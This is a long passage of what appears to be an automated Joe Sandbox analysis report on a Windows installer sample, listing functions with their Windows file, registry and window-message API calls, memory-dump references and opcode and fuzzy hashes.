                                                                            Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                            • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
                                                                            • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                            • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
                                                                            Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                            • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                                                            • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                            • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                                                            Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileMove
                                                                            • String ID:
                                                                            • API String ID: 3562171763-0
                                                                            • Opcode ID: f7dd985994354922a31a73053084a1032987b0bc5b579566ae0dfe4bf6eb674a
                                                                            • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
                                                                            • Opcode Fuzzy Hash: f7dd985994354922a31a73053084a1032987b0bc5b579566ae0dfe4bf6eb674a
                                                                            • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
                                                                            Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                            • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                            • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                            • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                            Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                            • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                            • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                                                            Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                            • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                            • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                                                            Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                            • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                            • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                                                            Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID:
                                                                            • API String ID: 1096422788-0
                                                                            • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                            • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                            • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                            • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                            Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,: Completed,?), ref: 004060DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                            • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                            • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                                                            Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: fa9329c38297884b38737862244368f77318cb6715222e6553afc9fa3614b21f
                                                                            • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                                                            • Opcode Fuzzy Hash: fa9329c38297884b38737862244368f77318cb6715222e6553afc9fa3614b21f
                                                                            • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                                                            Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                            • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                                                            • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                            • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                                                            Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                            • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                            • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                            • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                            Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                            Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
